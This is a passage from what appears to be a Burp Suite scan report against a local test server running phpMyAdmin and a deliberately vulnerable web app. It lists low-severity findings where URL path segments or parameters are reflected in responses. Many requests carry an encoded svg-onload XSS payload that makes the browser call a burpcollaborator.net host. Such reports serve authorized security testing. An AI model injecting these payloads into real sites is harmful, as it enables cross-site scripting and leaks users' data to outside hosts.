Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:12:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 332
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/sqli_blind/sourcexsbrcttd52/ was not found on this server.</p>
...[SNIP]...
19.189. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//6v29lsi0ixbtnro40hpfroygq7w2k6muek2buykm9%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//6v29lsi0ixbtnro40hpfroygq7w2k6muek2buykm9\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.190. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//iwilm4jcj9c5o3pg1tqrs0zsrjxelin6fw3tqje8%5c56burpcollaborator.net'%3e/vulnerabilities/view_help.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 427
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//iwilm4jcj9c5o3pg1tqrs0zsrjxelin6fw3tqje8\56burpcollaborator.net'&gt;/vulnerabilities/view_help.php was not found on this server.</p>
...[SNIP]...
19.191. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//hrckh3ebe874j2kfwslqnzurmisdghi5avyslj98%5c56burpcollaborator.net'%3e/view_help.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 416
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//hrckh3ebe874j2kfwslqnzurmisdghi5avyslj98\56burpcollaborator.net'&gt;/view_help.php was not found on this server.</p>
...[SNIP]...
19.192. http://localhost/examplewebiste/vulnerabilities/view_help.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_help.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/view_help.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fmsipi8fgfd89k7lkxxmvo4vwnntihmjab0zumlaa%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 432
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/view_help.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//msipi8fgfd89k7lkxxmvo4vwnntihmjab0zumlaa\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.193. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//gk4ja27a7703c1deprepgynqfhlc9ge46uulm8cw1%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//gk4ja27a7703c1deprepgynqfhlc9ge46uulm8cw1\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.194. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2qt5godwdt6pinj0vdkbmktcl3ryf2kqcg0dn3bs%5c56burpcollaborator.net'%3e/vulnerabilities/view_source.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 429
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2qt5godwdt6pinj0vdkbmktcl3ryf2kqcg0dn3bs\56burpcollaborator.net'&gt;/vulnerabilities/view_source.php was not found on this server.</p>
...[SNIP]...
19.195. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//jtgmj5gdga96l4mhyunsp1wtokufijn7fx3uqlea%5c56burpcollaborator.net'%3e/view_source.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 418
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//jtgmj5gdga96l4mhyunsp1wtokufijn7fx3uqlea\56burpcollaborator.net'&gt;/view_source.php was not found on this server.</p>
...[SNIP]...
19.196. http://localhost/examplewebiste/vulnerabilities/view_source.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/view_source.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2f0qr3gmdudr6niljyvbk9mital1rwf0koce08nzbo%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 434
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/view_source.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0qr3gmdudr6niljyvbk9mital1rwf0koce08nzbo\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.197. http://localhost/icons/small/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /icons/small/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /icons/smallo4r9e27531/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:17:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /icons/smallo4r9e27531/ was not found on this server.</p>
...[SNIP]...
19.198. http://localhost/phpmyadmin/doc/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/docdzs9sh1330/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:17:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/docdzs9sh1330/ was not found on this server.</p>
...[SNIP]...
19.199. http://localhost/phpmyadmin/doc/html/search.html [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/doc/html/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ua8x0gxoxlqh2f3sf5436cd45vbqzhzdn5dt4lrbf0%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/doc/html/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ua8x0gxoxlqh2f3sf5436cd45vbqzhzdn5dt4lrbf0\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.200. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//0pq3fmcucr5nhliyubj9lisak1qwenej2bszpmfa4%5c56burpcollaborator.net'%3e/doc/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0pq3fmcucr5nhliyubj9lisak1qwenej2bszpmfa4\56burpcollaborator.net'&gt;/doc/html/search.html was not found on this server.</p>
...[SNIP]...
19.201. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//rzuupdmlmifercsp42t0v921us0noeoac22qzdq1f%5c56burpcollaborator.net'%3e/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 426
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//rzuupdmlmifercsp42t0v921us0noeoac22qzdq1f\56burpcollaborator.net'&gt;/html/search.html was not found on this server.</p>
...[SNIP]...
19.202. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/doc/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//im8lc49c9925e3fgrtgri0pshjneb5b1ztphm4es3%5c56burpcollaborator.net'%3e/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/doc/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//im8lc49c9925e3fgrtgri0pshjneb5b1ztphm4es3\56burpcollaborator.net'&gt;/search.html was not found on this server.</p>
...[SNIP]...
19.203. http://localhost/phpmyadmin/index.php [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

POST /phpmyadmin/index.php7ch2m92yob HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Cookie: pma_lang=en; phpMyAdmin=1bg782nlrv2jgqql6iul04nac0

set_session=1bg782nlrv2jgqql6iul04nac0&pma_username=IRyDYmDn&pma_password=p9A%21a6t%21D6&server=1&target=index.php&lang=en&token=YV%2cge%5dj%243LyLHn*%7f

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:24:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/index.php7ch2m92yob was not found on this server.</p>
...[SNIP]...
19.204. http://localhost/phpmyadmin/index.php [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//gbvj12yay7r3314egr5p7yeq6hcc0314pwfkc72vr%5c56burpcollaborator.net'%3e/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 408
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//gbvj12yay7r3314egr5p7yeq6hcc0314pwfkc72vr\56burpcollaborator.net'&gt;/index.php was not found on this server.</p>
...[SNIP]...
19.205. http://localhost/phpmyadmin/index.php [db parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the db request parameter is copied into the application's response.

Request 1

GET /phpmyadmin/index.php?db=wmgf3889su&table=&lang=en&token=.%5e.m%3fYGGHz9M*%24Fa&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=o4gqqj8cksmreut7dot66foa0j

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:19:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=r6egbqhebq3c8uqiqo8n6j564f; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:19:22 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:19:22 +0000
Set-Cookie: phpMyAdmin=r6egbqhebq3c8uqiqo8n6j564f; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=hchi6ior49fo3s35gve55nhkia; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14438
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<![CDATA[
PMA_commonParams.setAll({common_query:"",opendb_url:"db_structure.php",lang:"en",server:"1",table:"",db:"wmgf3889su",token:"L#f!NPlyf;(=miP-",text_dir:"ltr",show_databases_navigation_as_tree:true,pma_text_default_tab:"Browse",pma_text_left_default_tab:"Structure",pma_text_left_default_tab2:false,LimitChars:"50",pft
...[SNIP]...
<input type="hidden" name="db" value="wmgf3889su" />
...[SNIP]...
<input type="hidden" name="db" value="wmgf3889su" />
...[SNIP]...
19.206. http://localhost/phpmyadmin/index.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /phpmyadmin/index.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fshdv7e4m4jxf9daqm3b1dak2ctio6f7gv8lwfj67v%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/index.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//shdv7e4m4jxf9daqm3b1dak2ctio6f7gv8lwfj67v\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.207. http://localhost/phpmyadmin/index.php [table parameter]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the table request parameter is copied into the application's response.

Request 1

GET /phpmyadmin/index.php?db=&table=3qsbs0mdeb&lang=en&token=.%5e.m%3fYGGHz9M*%24Fa&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=o4gqqj8cksmreut7dot66foa0j

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:20:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=9ecie0859gvu0v2qf4gdmpuh6d; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:20:08 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:20:08 +0000
Set-Cookie: phpMyAdmin=9ecie0859gvu0v2qf4gdmpuh6d; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=v5dl5v7e01tb93odlp3hthbv1b; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
